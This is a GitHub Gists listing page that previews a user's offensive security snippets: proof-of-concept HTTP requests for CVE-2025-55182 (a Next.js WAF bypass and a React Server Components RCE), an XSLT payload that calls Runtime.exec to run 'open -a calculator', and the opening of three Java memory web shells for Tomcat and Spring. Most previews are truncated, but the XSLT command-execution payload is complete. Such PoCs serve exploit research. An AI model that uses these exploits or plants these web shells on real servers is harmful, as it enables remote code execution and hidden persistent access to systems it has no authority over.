Skip to content

Instantly share code, notes, and snippets.

View m01e-40x's full-sized avatar
🏠
Working from home

m01e m01e-40x

🏠
Working from home
95 followers · 151 following
View GitHub Profile
@m01e-40x
m01e-40x / CVE-2025-55182 Next.js Waf Bypass POC
Created January 7, 2026 09:25 — forked from D0n9/CVE-2025-55182 Next.js Waf Bypass POC
CVE-2025-55182 Next.js Waf Bypass POC
POST / HTTP/1.1
Host: localhost
User-Agent: python-requests/2.32.5
Accept-Encoding: gzip, deflate
Accept: */*
Next-Action: x
Content-Length: 1452
Content-Type: multipart/form-data; boundary=48864b92f2a7dd41cc10c2cbe428f6f3
Connection: keep-alive
@m01e-40x
m01e-40x / CVE-2025-55182.http
Created December 5, 2025 09:08 — forked from maple3142/CVE-2025-55182.http
CVE-2025-55182 React Server Components RCE POC
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
@m01e-40x
m01e-40x / select.xslt
Created January 8, 2025 09:44 — forked from thanatoskira/select.xslt
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
<!-- #114 Utf8: open -a calculator -->
<!-- #115 String: touch /tmp/pwn -->
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
<!-- #132 Utf8: <init> -->
<AAA select="&lt;init&gt;"/>
@m01e-40x
m01e-40x / FilterMemShell.java
Created May 17, 2023 15:13
A Filter-Type MemShell for Tomcat/SpringMVC_Tomcat/Springboot_Tomcat
import org.apache.catalina.core.ApplicationContext;
import org.apache.catalina.core.ApplicationContextFacade;
import org.apache.catalina.core.StandardContext;
import org.apache.tomcat.util.descriptor.web.FilterDef;
import org.apache.tomcat.util.descriptor.web.FilterMap;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import javax.servlet.*;
import javax.servlet.http.HttpServletRequest;
@m01e-40x
m01e-40x / SpringInterceptorMemShell.java
Last active May 13, 2023 10:35
An Interceptor-Type MemShell for SpringMVC.
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import org.springframework.web.servlet.handler.AbstractHandlerMapping;
import org.springframework.web.servlet.handler.MappedInterceptor;
import org.springframework.web.servlet.handler.SimpleUrlHandlerMapping;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import sun.java2d.pipe.SpanShapeRenderer;
@m01e-40x
m01e-40x / SpringControllerMemShell.java
Created April 8, 2022 15:07
Three Controller-Type MemShells for SpringMVC.
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;